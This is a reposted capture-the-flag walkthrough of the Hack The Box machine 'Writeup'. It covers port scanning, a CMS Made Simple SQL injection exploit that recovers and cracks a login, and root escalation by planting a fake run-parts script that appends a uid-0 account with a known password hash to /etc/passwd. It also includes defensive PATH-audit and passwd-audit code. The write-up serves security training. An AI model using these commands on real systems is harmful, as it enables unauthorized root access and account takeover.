Hack The Box - Writeup
source link: https://www.tuicool.com/articles/YrieMvb
My write-up / walkthrough for Writeup from Hack The Box.
Quick Summary
Hey guys, Writeup retired today and here’s my write-up about it. It was a very nice box and I enjoyed it. It’s a Linux box and its IP is 10.10.10.138; I added it to /etc/hosts as writeup.htb. Let’s jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/writeup# nmap -sV -sT -sC -o nmapinitial writeup.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-11 16:03 EET
Nmap scan report for writeup.htb (10.10.10.138)
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds
We got http on port 80 and ssh on port 22. On port 80 nmap found /robots.txt with a disallowed entry for /writeup.
Web Enumeration
http://writeup.htb
The index page says that the website is not ready yet; it also says that there’s a DoS protection script, so we won’t bruteforce anything.
Let’s check /writeup:
/writeup is the write-ups page and, as the index page said, it’s still not ready; that’s why it was disallowed in robots.txt.
I checked wappalyzer’s results and saw that it’s using a CMS called CMS Made Simple:
Without wappalyzer we can still identify that by looking at the source of the page:
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
SQLi, User Flag
I searched for exploits for CMS Made Simple, and because the version was from 2019 (Copyright (C) 2004-2019) I searched only for exploits from 2019.
I found this SQL injection exploit, so I gave it a try.
I set the time to 3:
TIME = 3
Then I ran the exploit :
root@kali:~/Desktop/HTB/boxes/writeup# python 46635.py -u http://writeup.htb/writeup/ --crack -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: [email protected]
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
Now we can ssh into the box as jkr : raykayjay9:
We owned user.
Hijacking run-parts, Root Flag
I downloaded pspy32 to the box and ran it to monitor the processes, and I noticed the following:
2019/10/11 10:35:58 CMD: UID=0    PID=2279   | sshd: [accepted]
2019/10/11 10:35:58 CMD: UID=102  PID=2280   | sshd: [net]
2019/10/11 10:36:00 CMD: UID=0    PID=2281   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2019/10/11 10:36:00 CMD: UID=0    PID=2282   | run-parts --lsbsysinit /etc/update-motd.d
2019/10/11 10:36:00 CMD: UID=0    PID=2283   | /bin/sh /etc/update-motd.d/10-uname
2019/10/11 10:36:00 CMD: UID=0    PID=2284   | /bin/sh /etc/update-motd.d/10-uname
2019/10/11 10:36:00 CMD: UID=0    PID=2285   | sshd: jkr [priv]
On every successful ssh login:
sshd: [accepted]
sshd: [net]
these commands get executed:
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
run-parts --lsbsysinit /etc/update-motd.d
/bin/sh /etc/update-motd.d/10-uname
/bin/sh /etc/update-motd.d/10-uname
When I checked jkr’s groups I saw that jkr was in a group called staff:
jkr@writeup:/tmp$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
And staff members could write to /usr/local/bin:
jkr@writeup:/tmp$ find / -group staff 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
By default run-parts was in /bin:
jkr@writeup:/tmp$ which run-parts
/bin/run-parts
But if we take a look at the env command that sets the PATH on every ssh login, we’ll see that /usr/local/bin comes before /bin:
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Which means that we can put an executable of our choice in /usr/local/bin and call it run-parts, then ssh into the box again and our fake run-parts will be executed as root.
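As an added defensive check (not part of the original write-up), the Python below walks a PATH string the way the shell does and reports every group- or world-writable directory that is searched before a command is found. `demo()` builds a constructed temp layout mirroring the box (a group-writable local/bin ahead of the real bin/run-parts) and shows the finding disappearing once group write is removed; the layout, directory names and function names are assumptions.

```python
import os
import stat
import tempfile

# Constructed layout mirroring the box: local/bin group-writable, run-parts in bin.
LAYOUT = ("local/sbin", "local/bin", "sbin", "bin")

def audit_path(path_value, commands):
    """Resolve each command as a shell would, left to right through PATH.
    Every group/world-writable directory searched before (or at) the point the
    command is found is reported: a file planted there shadows the real binary."""
    report = {}
    for cmd in commands:
        resolved, exposed = None, []
        for directory in filter(None, path_value.split(":")):
            if resolved is not None or not os.path.isdir(directory):
                continue
            if os.stat(directory).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                exposed.append(directory)
            candidate = os.path.join(directory, cmd)
            if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
                resolved = candidate
        report[cmd] = {"resolved": resolved, "hijackable_dirs": exposed}
    return report

def relative_report(report, root):
    """Strip the temp-dir prefix so results are stable across runs."""
    return {c: {"resolved": os.path.relpath(v["resolved"], root) if v["resolved"] else None,
                "hijackable_dirs": [os.path.relpath(d, root) for d in v["hijackable_dirs"]]}
            for c, v in report.items()}

def demo():
    """Build the constructed layout in a temp dir; audit before and after
    dropping group write on local/bin (the fix an admin would apply)."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    for sub in LAYOUT:
        os.makedirs(os.path.join(root, sub))
        os.chmod(os.path.join(root, sub), 0o755)
    os.chmod(os.path.join(root, "local/bin"), 0o2775)  # staff-writable, as on the box
    real = os.path.join(root, "bin", "run-parts")
    with open(real, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(real, 0o755)
    path_value = ":".join(os.path.join(root, d) for d in LAYOUT)
    before = relative_report(audit_path(path_value, ["run-parts"]), root)
    os.chmod(os.path.join(root, "local/bin"), 0o2755)  # fix: no group write
    after = relative_report(audit_path(path_value, ["run-parts"]), root)
    return {"before": before, "after": after}
```

Run `audit_path(os.environ["PATH"], ["run-parts"])` on a real host to audit the PATH a privileged script inherits; `demo()` only exercises the constructed layout.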
I wrote a bash script that echoes:
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
to /etc/passwd, which will add a new user rooot : AAAA with uid 0 (same as in the previous post).
jkr@writeup:/usr/local/bin$ nano run-parts
jkr@writeup:/usr/local/bin$ chmod +x run-parts
jkr@writeup:/usr/local/bin$ cat run-parts
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
jkr@writeup:/usr/local/bin$ which run-parts
/usr/local/bin/run-parts
jkr@writeup:/usr/local/bin$
Then I started a new ssh session and the script was successfully executed:
root@kali:~/Desktop/HTB/boxes/writeup# ssh [email protected]
[email protected]'s password:
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 11 10:48:16 2019 from 10.10.xx.xx
jkr@writeup:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
messagebus:x:101:104::/var/run/dbus:/bin/false
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
jkr:x:1000:1000:jkr,,,:/home/jkr:/bin/bash
mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
jkr@writeup:~$ su rooot
Password:
root@writeup:/home/jkr# whoami
root
And we owned root!
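As an added detection example (not from the original write-up), this Python parses the passwd format and flags exactly what the planted line introduced: a second uid-0 account and a hash sitting in /etc/passwd instead of /etc/shadow. The sample is a constructed, trimmed copy of the listing above, and the function names are assumptions.

```python
# Constructed sample: a trimmed copy of the /etc/passwd listing above,
# ending with the planted "rooot" line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
jkr:x:1000:1000:jkr,,,:/home/jkr:/bin/bash
mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
"""

# Values a sane passwd file carries in field 2: the real hash lives in /etc/shadow.
SHADOWED = {"x", "*", "!", "!!"}

def parse_passwd(text):
    """Parse the 7-field colon-separated format; reject malformed lines loudly."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries

def find_suspicious(entries):
    """Flag the two things the run-parts payload produced: an extra uid-0
    account and a password hash stored directly in /etc/passwd."""
    findings, seen = [], set()
    for e in entries:
        if e["name"] in seen:
            findings.append(f"duplicate username: {e['name']}")
        seen.add(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"extra uid-0 account: {e['name']}")
        if e["pw"] == "":
            findings.append(f"empty password field: {e['name']}")
        elif e["pw"] not in SHADOWED:
            findings.append(f"hash stored in /etc/passwd: {e['name']}")
    return findings

def audit_passwd(text=SAMPLE_PASSWD):
    """Convenience wrapper: parse then audit; defaults to the constructed sample."""
    return find_suspicious(parse_passwd(text))
```

On a live host, feed `open("/etc/passwd").read()` to `audit_passwd()`; a clean file returns an empty list.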
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on twitter @Ahm3d_H3sham.
Thanks for reading.
Previous Hack The Box write-up: Hack The Box - Ghoul